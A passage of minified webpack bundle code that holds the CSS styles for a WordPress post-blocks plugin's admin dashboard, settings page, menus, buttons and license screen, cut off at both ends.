8px;border-radius:2px;color:#fff}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-dropdown__label::-webkit-scrollbar{display:none}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-dropdown{text-align:left;width:100%;display:flex;align-items:center;position:relative}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-dropdown .ultp-condition-text{width:100%;display:inline-flex;padding:0 10px 0 10px;align-items:center}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-dropdown .ultp-condition-text .ultp-condition-arrow{font-size:15px;display:inline-block;padding-left:15px;line-height:1.5}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-dropdown span{cursor:pointer}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-dropdown .ultp-dropdown-value__close{color:#fff;background:#000;margin-left:8px;border-radius:50%;font-size:14px;line-height:1;height:auto;width:auto}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-dropdown__default{width:100%;display:block;padding:12px 0}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-dropdown__content{width:100%;display:flex;align-items:center;justify-content:space-between}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-dropdown__content .ultp-condition-arrow{top:3px}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-search{background:#fff;position:absolute;left:0;z-index:1;top:39px;width:100%;padding:10px;border-radius:0;box-sizing:border-box;border:1px solid #eaedf2}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-search input{width:100%;border-radius:2px;min-height:34px;border:1px solid #eaedf2}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-search li{cursor:pointer;text-align:left;margin-bottom:12px}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-search li:last-child{margin-bottom:0}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-save-condition{width:100%;font-size:14px;position:sticky;bottom:0;color:#fff;border-radius:4px;padding:15px;border:none;cursor:pointer;background-image:linear-gradient(#399aff, #016cdb)}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-save-condition span{font-size:17px;margin-left:4px;color:#fff}.ultp-builder-items .ultp-premade-img__blank{height:100%;display:flex;align-items:center;justify-content:center;padding:20px}.ultp-premade-img__blank img{max-height:395px}.ultp-list-blank-img img{opacity:.1}.ultp-list-blank-img a{text-decoration:none !important}@media only screen and (max-width: 1100px){.ultp-builder-dashboard__content{gap:20px;grid-template-columns:auto}.ultp-builder-dashboard__content .ultp-builder-tab__option{min-width:300px;width:fit-content;min-height:fit-content}.ultp-builder-tab__content .ultp-builder-items{grid-template-columns:1fr 1fr}}.ultp-builder-create-btn{text-transform:capitalize}",""]);const l=i},5735:(e,t,n)=>{"use strict";n.d(t,{Z:()=>l});var a=n(8081),r=n.n(a),o=n(3645),i=n.n(o)()(r());i.push([e.id,'@media only screen and (max-width: 1350px){.ultp-menu-items div{margin:0px 10px 0 0}}@media only screen and (max-width: 1250px){.ultp-menu-items div a:after{bottom:-2px;height:2px}}.dash-faq-container{min-width:170px}.dash-faq-container a{text-decoration:none;font-size:14px;color:#575a5d;display:flex;gap:8px;align-items:center;width:-webkit-fill-available;padding-right:32px}.dash-faq-container a:focus{box-shadow:none}.dash-faq-container a .dashicons{padding-top:2px}.dash-faq-container a:hover{color:var(--postx-primary-color)}.dash-faq-container{display:flex;flex-direction:column;gap:15px;padding:25px;position:absolute;right:20px;top:70px;border-radius:2px;box-shadow:0 2px 4px 0 rgba(8,68,129,.2);background-color:#fff;z-index:1}.dash-faq-container::before{content:"";content:"";position:absolute;right:0px;top:-29px;font:normal 42px dashicons;color:#fff}.ultp-dashboard-container-grid{display:grid;grid-template-columns:auto 424px;gap:32px}@media only screen and (max-width: 1250px){.ultp-dashboard-container-grid{display:flex;flex-direction:column}}@media only screen and (max-width: 1250px){.ultp-dashboard-container-grid{display:flex;flex-direction:column}}.ultp-dashboard-container-grid .ultp-dashboard-content{display:flex;gap:32px;flex-direction:column}.ultp-dashboard-container-grid .ultp-dashboard-content .ultp-dash-banner,.ultp-dashboard-container-grid .ultp-dashboard-content .ultp-dash-pro-promo,.ultp-dashboard-container-grid .ultp-dashboard-content .ultp-dash-blocks{padding:32px}.ultp-dashboard-container-grid .ultp-dashboard-content .ultp-dash-item-con{box-shadow:0px 2px 4px 0px rgba(27,28,29,.0392156863)}.ultp-dash-banner{padding:32px;display:flex;gap:80px;justify-content:space-between}@media screen and (max-width: 758px){.ultp-dash-banner{padding:16px;flex-direction:column-reverse;gap:8px;width:fit-content}}.ultp-dash-banner .ultp-dash-banner-left .ultp-dash-banner-title{font-weight:600;font-size:24px;line-height:32px;color:#070707}@media screen and (max-width: 768px){.ultp-dash-banner .ultp-dash-banner-left .ultp-dash-banner-title{font-size:18px;display:inline-block}}.ultp-dash-banner .ultp-dash-banner-left .ultp-dash-banner-description{max-width:365px;font-size:16px;line-height:24px;color:#41474e;margin-top:14px}.ultp-dash-banner .ultp-dash-banner-left .ultp-primary-alter-button{padding:10px 24px;margin-top:32px}.ultp-dash-banner .ultp-dash-banner-right{width:352px}.ultp-dash-banner .ultp-dash-banner-right .ultp-dash-banner-right-img{position:relative}.ultp-dash-banner .ultp-dash-banner-right .ultp-dash-banner-right-img img{max-width:100%}@keyframes pulse-border{0%{box-shadow:0 0 0 5px rgba(241,19,108,.6)}70%{box-shadow:0 0 0 15px rgba(255,67,142,0)}100%{box-shadow:0 0 0 5px rgba(255,67,142,0)}}.ultp-dash-banner .ultp-dash-banner-right .ultp-dash-banner-right-img .ultp-dash-banner-right-play-button{cursor:pointer;width:64px;height:64px;border-radius:50%;background-color:#fff;display:flex;align-items:center;justify-content:center;position:absolute;top:50%;right:50%;transform:translate(50%, -50%);animation:pulse-border 1.2s ease-in infinite}.ultp-dash-banner .ultp-dash-banner-right .ultp-dash-banner-right-img .ultp-dash-banner-right-play-button svg{width:24px;height:24px;color:#070707;margin-top:-1px;margin-left:1px}.ultp-dash-banner .ultp-dash-banner-right .ultp-dash-banner-right-video{width:352px;height:240px;border-radius:8px;overflow:hidden;box-shadow:0px 0px 42.67px 0px rgba(212,212,221,.4784313725)}.ultp-dash-banner .ultp-dash-banner-right .ultp-dash-banner-right-video iframe{width:100%;height:100%}.ultp-dash-pro-promo{padding:32px;background-color:#fff;display:flex;gap:80px;justify-content:space-between}@media only screen and (max-width: 1400px){.ultp-dash-pro-promo{flex-direction:column-reverse;gap:24px}}@media only screen and (max-width: 758px){.ultp-dash-pro-promo{flex-direction:column-reverse;gap:24px;padding:16px}}.ultp-dash-pro-promo .ultp-dash-pro-promo-left .ultp-dash-pro-promo-left-title{font-weight:600;font-size:24px;line-height:32px;color:#070707}@media only screen and (max-width: 1250px){.ultp-dash-pro-promo .ultp-dash-pro-promo-left .ultp-dash-pro-promo-left-title{font-size:18px}}.ultp-dash-pro-promo .ultp-dash-pro-promo-left .ultp-dash-pro-promo-left-description{max-width:365px;font-size:16px;line-height:24px;color:#41474e;margin-top:14px}@media only screen and (max-width: 1250px){.ultp-dash-pro-promo .ultp-dash-pro-promo-left .ultp-dash-pro-promo-left-description{font-size:14px}}.ultp-dash-pro-promo .ultp-dash-pro-promo-left .ultp-primary-alter-button{margin-top:32px}.ultp-dash-pro-promo .ultp-dash-pro-promo-left .ultp-dash-pro-promo-left-keyfeature{display:flex;column-gap:24px;row-gap:12px;flex-wrap:wrap;margin-top:24px}.ultp-dash-pro-promo .ultp-dash-pro-promo-left .ultp-dash-pro-promo-left-keyfeature .ultp-dash-pro-promo-left-keyfeature-item{display:flex;align-items:center;gap:6px;font-weight:500;font-size:14px;line-height:20px;color:#070707}.ultp-dash-pro-promo .ultp-dash-pro-promo-left .ultp-dash-pro-promo-left-keyfeature .ultp-dash-pro-promo-left-keyfeature-item svg{width:20px;height:20px;color:#1f66ff}.ultp-dash-pro-promo .ultp-dash-pro-promo-right-img{max-width:352px;object-fit:contain}.ultp-dash-blocks{padding:32px}@media only screen and (max-width: 1250px){.ultp-dash-blocks{padding:16px}}.ultp-dash-blocks .ultp-dash-blocks-heading{display:flex;justify-content:space-between;align-items:center;margin-bottom:24px}.ultp-dash-blocks .ultp-dash-blocks-heading .ultp-dash-blocks-heading-title{font-weight:600;font-size:18px;line-height:24px;color:#0a0d14}.ultp-dash-blocks .ultp-dash-blocks-heading .ultp-transparent-button{color:#1f66ff !important}.ultp-dash-blocks .ultp-dash-blocks-heading .ultp-transparent-button svg{fill:#1f66ff !important;width:20px;height:20px}.ultp-dash-blocks .ultp-dash-blocks-items{display:grid;grid-template-columns:1fr 1fr 1fr;gap:16px}@media only screen and (max-width: 1500px){.ultp-dash-blocks .ultp-dash-blocks-items{grid-template-columns:1fr 1fr}}@media only screen and (max-width: 1250px){.ultp-dash-blocks .ultp-dash-blocks-items{grid-template-columns:1fr}}.ultp-dash-blocks .ultp-dash-blocks-items .ultp-dash-blocks-item{display:flex;gap:8px;align-items:center;justify-content:space-between;border:1px solid #e6e6e6;border-radius:8px;background:#fbfbfb;box-shadow:none}.ultp-dash-blocks .ultp-dash-blocks-items .ultp-blocks-item-meta{display:flex;align-items:center;gap:8px}.ultp-dash-blocks .ultp-dash-blocks-items .ultp-blocks-item-meta .ultp-blocks-item-icon{width:24px;height:24px}.ultp-dash-blocks .ultp-dash-blocks-items .ultp-blocks-item-meta .ultp-blocks-item-title{font-weight:500;font-size:14px;line-height:20px;color:#2e2e2e}.ultp-dash-blocks .ultp-dash-blocks-items .ultp-blocks-control-option{display:flex;align-items:center;gap:8px}.ultp-dash-blocks .ultp-dash-blocks-items .ultp-blocks-control-option .ultp-option-tooltip{font-size:12px;line-height:16px;color:#6e6e6e;text-decoration:none}',""]);const l=i},9455:(e,t,n)=>{"use strict";n.d(t,{Z:()=>l});var a=n(8081),r=n.n(a),o=n(3645),i=n.n(o)()(r());i.push([e.id,".ultp-dashboard-general-settings-container{display:grid;grid-template-columns:auto 360px;gap:32px}.ultp-dashboard-general-settings-container .ultp-general-settings{height:fit-content;width:-webkit-fill-available;padding:32px}.ultp-dashboard-general-settings-container .ultp-general-settings form{margin-top:40px}.ultp-dashboard-general-settings-container .ultp-general-settings .skeletonOverflow{display:flex;gap:30px;flex-direction:column;margin-top:40px}.ultp-dashboard-general-settings-container .ultp-general-settings .onloading{cursor:no-drop}.ultp-dashboard-general-settings-container .ultp-general-settings .onloading svg{height:14px;width:14px;vertical-align:middle;margin-left:4px;animation:ultp-spin 1s linear infinite;color:#fff}@media only screen and (max-width: 1100px){.ultp-dashboard-general-settings-container{grid-template-columns:auto;justify-items:center}.ultp-dashboard-general-settings-container .ultp-general-settings-content-right{width:360px}}@media only screen and (max-width: 768px){.ultp-dashboard-general-settings-container .ultp-general-settings-content-right{width:100%}}",""]);const l=i},886:(e,t,n)=>{"use strict";n.d(t,{Z:()=>l});var a=n(8081),r=n.n(a),o=n(3645),i=n.n(o)()(r());i.push([e.id,".ultp-setting-hellobar{background:#037fff;padding:6px 0;text-align:center;color:rgba(255,255,255,.85);font-size:14px}.ultp-setting-hellobar a{margin-left:4px;font-weight:700;font-size:14px;color:#fff}.ultp-setting-hellobar strong{color:#fff;font-weight:700}.ultp-ring{-webkit-animation:ring 4s .7s ease-in-out infinite;-moz-animation:ring 4s .7s ease-in-out infinite;animation:ring 4s .7s ease-in-out infinite;margin-right:5px;font-size:20px;position:relative;top:2px;color:#fff}.helobarClose{position:absolute;cursor:pointer;right:15px}.helobarClose svg{height:16px;color:#fff}@keyframes ring{0%{transform:rotate(0)}1%{transform:rotate(30deg)}3%{transform:rotate(-28deg)}5%{transform:rotate(34deg)}7%{transform:rotate(-32deg)}9%{transform:rotate(30deg)}11%{transform:rotate(-28deg)}13%{transform:rotate(26deg)}15%{transform:rotate(-24deg)}17%{transform:rotate(22deg)}19%{transform:rotate(-20deg)}21%{transform:rotate(18deg)}23%{transform:rotate(-16deg)}25%{transform:rotate(14deg)}27%{transform:rotate(-12deg)}29%{transform:rotate(10deg)}31%{transform:rotate(-8deg)}33%{transform:rotate(6deg)}35%{transform:rotate(-4deg)}37%{transform:rotate(2deg)}39%{transform:rotate(-1deg)}41%{transform:rotate(1deg)}43%{transform:rotate(0)}100%{transform:rotate(0)}}",""]);const l=i},283:(e,t,n)=>{"use strict";n.d(t,{Z:()=>l});var a=n(8081),r=n.n(a),o=n(3645),i=n.n(o)()(r());i.push([e.id,'.ultp_h1{font-size:var(--postx-h1-fontsize);font-weight:var(--postx-h1-weight)}.ultp_h2{font-size:var(--postx-h2-fontsize);font-weight:var(--postx-h2-weight)}.ultp_h3{font-size:var(--postx-h3-fontsize);font-weight:var(--postx-h3-weight)}.ultp_h4{font-size:var(--postx-h4-fontsize);font-weight:var(--postx-h4-weight)}.ultp_h5{font-size:var(--postx-h5-fontsize);font-weight:var(--postx-h5-weight)}.ultp_h6{font-size:var(--postx-h6-fontsize);font-weight:var(--postx-h6-weight)}.ultp_h1,.ultp_h2,.ultp_h3,.ultp_h4,.ultp_h5,.ultp_h6{color:#091f36}.ultp-settings-container{margin:0 !important;background:#f6f8fa;padding:32px;min-height:100vh;height:100%}.ultp-settings-container .ultp-settings-content .ultp-premade-grid{background:#f6f8fa}@media screen and (max-width: 1250px){.ultp-settings-container{padding:12px}}.ultp-settings-content{margin:0 auto 40px !important;max-width:1376px}@media screen and (max-width: 768px){.ultp-settings-content{max-width:100%;overflow:scroll}}.ultp-dash-item-con{background:#fff;padding:12px;border-radius:8px;box-shadow:0 2px 4px 0 rgba(27,28,29,.0392156863)}.ultp-setting-header{display:grid;align-items:center;grid-template-columns:148px 502px auto 72px;gap:16px;background:var(--postx-white-color);border-bottom:1px solid var(--postx-border-color);padding:0 32px;position:sticky;top:32px;width:100%;height:67px;min-height:67px;box-sizing:border-box;z-index:99}@media screen and (max-width: 1200px){.ultp-setting-header{grid-template-columns:152px auto;background-color:#fff;gap:32px;height:auto;padding-top:12px;column-gap:38px;box-shadow:0px 0px 11px rgba(0,0,0,.168627451)}}@media screen and (max-width: 768px){.ultp-setting-header{display:flex;flex-wrap:wrap;padding:8px;height:auto}}.ultp-setting-hellobar{position:relative;background:#027fff;padding:6px 0;text-align:center;color:rgba(255,255,255,.85);font-size:14px}.ultp-setting-hellobar a{margin-left:4px;font-weight:700;color:#fff}.ultp-setting-hellobar strong{color:#fff}.helobarClose{position:absolute;top:50%;right:15px;transform:translateY(-50%);cursor:pointer}.helobarClose svg{height:10px;color:rgba(255,255,255,.43)}.ultp-pro-feature-lists{display:flex;flex-direction:column;gap:15px;margin-top:24px}.ultp-pro-feature-lists>span{display:inline-flex;gap:8px;align-items:center}.ultp-pro-feature-lists>span,.ultp-pro-feature-lists>span>span{color:#070707;font-weight:500;font-size:14px;line-height:20px}.ultp-pro-feature-lists>span>span>a{text-decoration:none}.ultp-pro-feature-lists>span>span>a .dashicons{color:var(--postx-primary-color);font-size:17px;line-height:1.2}.ultp-pro-feature-lists>span svg{height:16px;width:16px;vertical-align:middle;color:#070707;flex-shrink:0}.settingsLink{color:var(--postx-primary-color) !important}.ultp-ring{display:inline-block;margin-right:5px;font-size:20px;position:relative;top:2px;color:#fff;animation:ring 2s cubic-bezier(0.68, -0.55, 0.27, 1.55) infinite}@keyframes ring{0%{transform:rotate(0)}5%{transform:rotate(25deg)}10%{transform:rotate(-20deg)}15%{transform:rotate(12deg)}20%{transform:rotate(-6deg)}25%{transform:rotate(2deg)}28%,100%{transform:rotate(0)}}#postx-regenerate-css{display:none;margin-top:10px}#postx-regenerate-css span{color:var(--postx-white-color)}#postx-regenerate-css.active{display:inline-block}#postx-regenerate-css .dashicons{display:none;margin-right:8px;-webkit-animation:ultp-spin 1s linear infinite;animation:ultp-spin 1s linear infinite}#postx-regenerate-css.ultp-spinner .dashicons{display:inline-block}@keyframes ultp-spin{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}to{-webkit-transform:rotate(1turn);transform:rotate(1turn)}}form .ultp-settings-wrap{display:flex;flex-direction:column;gap:12px;margin-bottom:30px}form .ultp-settings-wrap strong{font-size:14px;color:#091f36;font-weight:500}form .ultp-settings-wrap .ultp-settings-field-wrap select,form .ultp-settings-wrap .ultp-settings-field-wrap input[type=text],form .ultp-settings-wrap .ultp-settings-field-wrap input[type=number]{height:36px;width:100%;max-width:100%;border:1px solid #eaedf2;border-radius:4px;color:#000;padding:0px 13px 0px;background-color:#fff;margin-bottom:3px}form .ultp-settings-wrap .ultp-settings-field-wrap textarea{width:100%;max-width:100%;border:1px solid #eaedf2;border-radius:4px;color:#000;padding:0px 13px 0px;background-color:#fff;margin-bottom:3px}form .ultp-settings-wrap .ultp-settings-field-wrap select[multiple]{max-height:100px;height:100%}form .ultp-settings-wrap .ultp-settings-field-wrap .ultp-description{font-size:12px}form .ultp-data-message{display:none;position:fixed;bottom:10%;padding:13px 14px 14px 15px;border-radius:4px;box-shadow:0 1px 2px 0 rgba(8,68,129,.2);background:rgba(115,184,28,.1);width:224px;color:#091f36}.ultp-upgrade-pro-btn{display:inline-block;padding:10px 25px;color:#fff;font-size:14px;background:linear-gradient(180deg, #ff9336, transparent) #de521e;border-radius:4px;text-decoration:none;width:fit-content;transition:background-color 400ms}.ultp-upgrade-pro-btn:hover{background-color:#ff9336;color:#fff}.ultp-upgrade-pro-btn:focus{outline:0;box-shadow:none}.ultp-upgrade-pro-btn:active{color:#fff}input[type=checkbox]{width:22px;height:20px;border-radius:2px;border:solid 1px #eaedf2;background:#fff;position:relative;margin:0;box-shadow:none;display:inline-block}input[type=checkbox]+.ultp-description{margin-left:10px}input[type=checkbox]:checked{background:var(--postx-primary-color);border:none}input[type=checkbox]:checked::before{content:"✓";color:#fff;height:unset;width:unset;margin:unset;position:absolute;left:5px;top:9px;font-weight:900}.ultp-primary-button{cursor:pointer;padding:12px 25px;color:#fff !important;font-size:14px;background:#070707;border-radius:4px;text-decoration:none;display:flex;align-items:center;width:fit-content;border:none;transition:background-color 400ms;gap:8px;line-height:20px}.ultp-primary-button:hover{background-color:var(--postx-primary-color)}.ultp-primary-button:focus{outline:0;box-shadow:none}.ultp-secondary-button{cursor:pointer;padding:10px 25px;color:#070707;font-size:14px;background:rgba(0,0,0,0);border-radius:4px;text-decoration:none;border:1px solid #070707;display:inline-flex;align-items:center;width:fit-content;transition:background-color 400ms}.ultp-secondary-button:hover{background-color:#dee5fa}.ultp-secondary-button:focus{outline:0;box-shadow:none}.ultp-primary-alter-button{cursor:pointer;padding:12px 24px;color:#fff !important;font-size:14px;background:var(--postx-primary-color);border-radius:4px;text-decoration:none;display:flex;align-items:center;width:fit-content;border:none;transition:background-color 400ms;gap:8px;line-height:20px}.ultp-primary-alter-button:hover{background-color:#070707}.ultp-primary-alter-button:focus{outline:0;box-shadow:none}.ultp-transparent-button{cursor:pointer;color:#a1a1a1 !important;font-size:14px;background:rgba(0,0,0,0);border-radius:4px;text-decoration:none;display:flex;align-items:center;width:fit-content;transition:background-color 400ms;gap:8px}.ultp-transparent-button:hover{text-decoration:underline}.ultp-transparent-button:focus{outline:0;box-shadow:none}.ultp-transparent-alter-button{cursor:pointer;color:#4a4a4a;font-size:14px;background:rgba(0,0,0,0);text-decoration:underline;display:flex;align-items:center;width:fit-content;transition:background-color 400ms;gap:8px}.ultp-transparent-alter-button:hover{color:#3c3c3c}.ultp-transparent-alter-button:focus{outline:0;box-shadow:none}.ultp-primary-button svg,.ultp-primary-alter-button svg,.ultp-secondary-button svg,.ultp-transparent-button svg,.ultp-transparent-alter-button svg{width:24px;height:24px}.cursor{cursor:pointer}#wpbody-content:has(.ultp-menu-items-wrap){padding:0 !important;background-color:#f6f8fa}.ultp-menu-items-wrap{line-height:1.6}.ultp-menu-items-wrap h1,.ultp-menu-items-wrap h2,.ultp-menu-items-wrap h3,.ultp-menu-items-wrap h4,.ultp-menu-items-wrap h5,.ultp-menu-items-wrap h6{padding:0;margin:0}.ultp-menu-items-wrap .ultp-discount-wrap{transform:rotate(-90deg);width:150px;height:40px;display:flex;gap:10px;align-items:center;justify-content:center;border-radius:4px 4px 0 0;position:fixed;top:200px;right:-55px;z-index:99999;text-decoration:none;background:linear-gradient(60deg, hsl(224, 88%, 61%), hsl(359, 85%, 66%), hsl(44, 74%, 55%), hsl(89, 72%, 47%), hsl(114, 79%, 48%), hsl(179, 85%, 66%));background-size:300% 300%;background-position:0 50%;animation:ultp_moveGradient 4s alternate infinite;transition:.4s}.ultp-menu-items-wrap .ultp-discount-wrap .ultp-discount-text{font-weight:600;color:#fff;text-transform:uppercase;font-size:14px}@keyframes ultp_moveGradient{50%{background-position:100% 50%}}.ultp-ml-auto{margin-left:auto}.ultp-dash-control-options .ultp-addons-enable,.ultp-dash-control-options .ultp-blocks-enable{width:0;height:0;display:none}.ultp-dash-control-options .ultp-addons-enable:checked+.ultp-control__label,.ultp-dash-control-options .ultp-blocks-enable:checked+.ultp-control__label{position:relative;background-color:var(--postx-primary-color);opacity:unset}.ultp-dash-control-options .ultp-addons-enable:checked+.ultp-control__label>span,.ultp-dash-control-options .ultp-blocks-enable:checked+.ultp-control__label>span{display:none}.ultp-dash-control-options .ultp-addons-enable:checked+.ultp-control__label::after,.ultp-dash-control-options .ultp-blocks-enable:checked+.ultp-control__label::after{left:calc(100% - 3px);transform:translateX(-100%)}.ultp-dash-control-options .ultp-addons-enable.disabled+.ultp-control__label,.ultp-dash-control-options .ultp-blocks-enable.disabled+.ultp-control__label{opacity:.25 !important}.ultp-dash-control-options>label{width:36px;height:18px;display:block;cursor:pointer;border-radius:100px;text-indent:-9999px;background:#d2d2d2;opacity:1;position:relative}.ultp-dash-control-options>label::after{content:"";position:absolute;top:3px;left:3px;width:12px;height:12px;border-radius:90px;background:var(--postx-white-color);transition:.3s}.rotate{animation:rotate 1.5s linear infinite}@keyframes rotate{to{transform:rotate(360deg)}}.ultp-setting-logo{display:flex;gap:4px;align-items:center;border-right:1px solid #e2e4e9;height:100%;width:100%;max-width:152px}@media screen and (max-width: 1300px){.ultp-setting-logo{padding-right:11px}}@media screen and (max-width: 768px){.ultp-setting-logo{border-right:none}}.ultp-setting-logo .ultp-setting-header-img{height:26px}.ultp-setting-logo .ultp-setting-version{font-size:14px;border:1px solid var(--postx-primary-color);border-radius:100px;padding:7px 11px;background:#edf6ff;color:var(--postx-primary-color);line-height:18px;font-weight:500}.ultp-menu-items{display:flex;gap:24px}@media screen and (max-width: 1200px){.ultp-menu-items{margin-top:-9px}}@media screen and (max-width: 768px){.ultp-menu-items{flex-wrap:wrap;gap:16px}}.ultp-menu-item{position:relative;text-decoration:none;font-size:14px;padding:0;color:#070707;position:relative;display:flex;gap:8px;font-weight:500;align-items:center;transition:400ms;white-space:nowrap}.ultp-menu-item:hover{color:#1f66ff}.ultp-menu-item:focus{outline:none;box-shadow:none}.ultp-menu-item:after{content:"";position:absolute;bottom:-21px;width:100%;height:2px;background:var(--postx-primary-color);left:0;opacity:0}@media only screen and (max-width: 1250px){.ultp-menu-item:after{bottom:-9px}}.ultp-menu-item svg{width:20px;height:20px;color:#1f66ff}.ultp-menu-item.current{color:var(--postx-primary-color)}.ultp-menu-item.current:after{opacity:1}.ultp-menu-item .ultp-menu-item-tag{position:absolute;top:-14px;right:-20px;background:#fdedf0;border-radius:100px;padding:2px 6px;font-size:10px;font-weight:500;color:#dc2671;animation:ultpMenuTagColor 2s ease-in-out infinite}@keyframes ultpMenuTagColor{0%{background-color:#f8d7dd}50%{background-color:#fdedf0}100%{background-color:#f8d7dd}}.ultp-menu-items div a:active,.ultp-menu-items div a:focus{outline:none;box-shadow:none;border:none}.ultp-secondary-menu{display:flex;align-items:center;gap:8px;justify-content:space-between;padding:12px 0 12px 16px;border-left:1px solid var(--postx-border-color);height:-webkit-fill-available}@media screen and (max-width: 1300px){.ultp-secondary-menu{padding-left:0px !important;width:fit-content;border:0px !important}}@media screen and (max-width: 768px){.ultp-secondary-menu{border-left:none;padding:0}}.ultp-secondary-menu .ultp-pro-button{background-color:#edf6ff;color:#1f66ff !important;border:1px solid #1f66ff;padding:8px 20px;font-weight:500;font-size:16px;text-wrap:nowrap;display:flex;align-items:center;gap:8px}@media screen and (max-width: 768px){.ultp-secondary-menu .ultp-pro-button{padding:4px 8px}}.ultp-secondary-menu .ultp-pro-button svg{width:24px;height:24px;color:#1f66ff}.ultp-secondary-menu .ultp-pro-button:hover{background-color:#1f66ff;color:#fff !important}.ultp-secondary-menu .ultp-pro-button:hover svg{color:#fff}ul:has(.ultp-dash-faq-icon){position:relative}.ultp-dash-faq-con{height:100%;border-left:1px solid var(--postx-border-color);display:flex;align-items:center;justify-content:center;position:relative}@media screen and (max-width: 1200px){.ultp-dash-faq-con{width:fit-content;margin-left:0px !important;padding-left:2%}}@media screen and (max-width: 768px){.ultp-dash-faq-con{border-left:none;margin:0px;position:relative}}.ultp-dash-faq-icon{height:auto;width:auto;font-size:35px;cursor:pointer}.ultp-ms-container{position:relative}.ultp-ms-container .ultp-ms-results-con{min-height:30px;max-width:100%;border:1px solid #eaedf2;border-radius:4px;color:#000;padding:8px 14px;background-color:#fff;margin-bottom:3px;display:flex;gap:10px;justify-content:space-between}.ultp-ms-container .ultp-ms-results-con .ultp-ms-results{display:flex;gap:8px;flex-wrap:wrap}.ultp-ms-container .ultp-ms-results-con .ultp-ms-results .ultp-ms-selected{padding:4px 8px;border-radius:2px;background-color:#7c8084;color:#fff;display:inline-flex;align-items:center;gap:6px}.ultp-ms-container .ultp-ms-results-con .ultp-ms-results .ultp-ms-selected .ultp-ms-remove{height:16px;width:14px}.ultp-ms-container .ultp-ms-results-con .ultp-ms-results .ultp-ms-selected .ultp-ms-remove:hover svg{color:var(--postx-primary-color)}.ultp-ms-container .ultp-ms-results-con .ultp-ms-results .ultp-ms-selected .ultp-ms-remove svg{color:#fff}.ultp-ms-container .ultp-ms-results-con .ultp-ms-results-collapse{height:12px;width:12px;display:inline-block}.ultp-ms-container .ultp-ms-options{display:flex;flex-direction:column;gap:5px;z-index:1;position:absolute;width:100%;box-sizing:border-box;margin-top:4px;border:1px solid #eaedf2;box-shadow:0 1px 2px 0 rgba(8,68,129,.2);border-radius:4px;color:#000;padding:8px 14px;background-color:#fff;margin-bottom:3px}.ultp-ms-container .ultp-ms-options .ultp-ms-option{padding:4px 8px;border-radius:2px}.ultp-ms-container .ultp-ms-options .ultp-ms-option:hover{background-color:#7c8084;color:#fff}.ultp-field-radio .ultp-field-radio-items{display:flex;gap:20px;flex-wrap:wrap}.ultp-field-radio .ultp-field-radio-items input[type=radio]:checked::before{background-color:var(--postx-primary-color)}.ultp-sidebar-features{display:flex;flex-direction:column;gap:32px}.ultp-sidebar-card-item{border-radius:8px;padding:24px;display:flex;flex-direction:column;box-shadow:0px 2px 4px 0px rgba(27,28,29,.0392156863);background-color:#fff}@media only screen and (max-width: 1250px){.ultp-sidebar-card-item{padding:16px}}.ultp-sidebar-card-item:has(.ultp-sidebar-card-title) img{margin-bottom:20px}.ultp-sidebar-card-item .ultp-sidebar-card-title{font-weight:600;font-size:18px;line-height:24px;color:#0a0d14}.ultp-sidebar-card-item .ultp-sidebar-card-description{font-size:14px;line-height:20px;color:#4a4a4a;margin-top:16px}.ultp-sidebar-card-item .ultp-primary-button,.ultp-sidebar-card-item .ultp-secondary-button,.ultp-sidebar-card-item .ultp-primary-alter-button,.ultp-sidebar-card-item .ultp-transparent-alter-button{padding:10px 24px;display:flex;align-items:center;gap:8px;margin-top:20px}.ultp-sidebar-card-item .ultp-primary-button svg,.ultp-sidebar-card-item .ultp-secondary-button svg,.ultp-sidebar-card-item .ultp-primary-alter-button svg,.ultp-sidebar-card-item .ultp-transparent-alter-button svg{width:20px;height:20px}.ultp-sidebar-card-item .ultp-sidebar-card-buttons{margin-top:24px}.ultp-sidebar-card-item .ultp-sidebar-card-buttons .ultp-primary-button,.ultp-sidebar-card-item .ultp-sidebar-card-buttons .ultp-secondary-button,.ultp-sidebar-card-item .ultp-sidebar-card-buttons .ultp-primary-alter-button,.ultp-sidebar-card-item .ultp-sidebar-card-buttons .ultp-transparent-alter-button{margin-top:0}.ultp-sidebar-card-item .ultp-sidebar-card-links{display:flex;gap:16px;flex-direction:column;margin-top:24px}.ultp-sidebar-card-item .ultp-sidebar-card-links .ultp-sidebar-card-link{text-decoration:none;color:#000;font-size:16px;font-weight:400;display:flex;align-items:center;gap:12px;line-height:normal}.ultp-sidebar-card-item .ultp-sidebar-card-links .ultp-sidebar-card-link:hover{text-decoration:underline}.ultp-sidebar-card-item .ultp-sidebar-card-links .ultp-sidebar-card-link span{display:flex}.ultp-sidebar-card-item .ultp-sidebar-card-links .ultp-sidebar-card-link svg{width:24px;height:24px;color:#1f66ff}.ultp-sidebar-card-item .ultp-sidebar-card-buttons{display:flex;gap:20px;align-items:center}',""]);const l=i},4421:(e,t,n)=>{"use strict";n.d(t,{Z:()=>l});var a=n(8081),r=n.n(a),o=n(3645),i=n.n(o)()(r());i.push([e.id,'.ultp-license{--brand-color: #037fff;--brand-color-fade: #f0f7ff;max-width:1600px;padding:32px !important;display:flex;margin:0 auto !important;gap:32px}.ultp-license__activation{background-color:#fff;padding:32px !important;box-shadow:0px 2px 4px 0px rgba(91,95,88,.078);max-width:890px;width:60%}.ultp-license__title{margin-bottom:32px 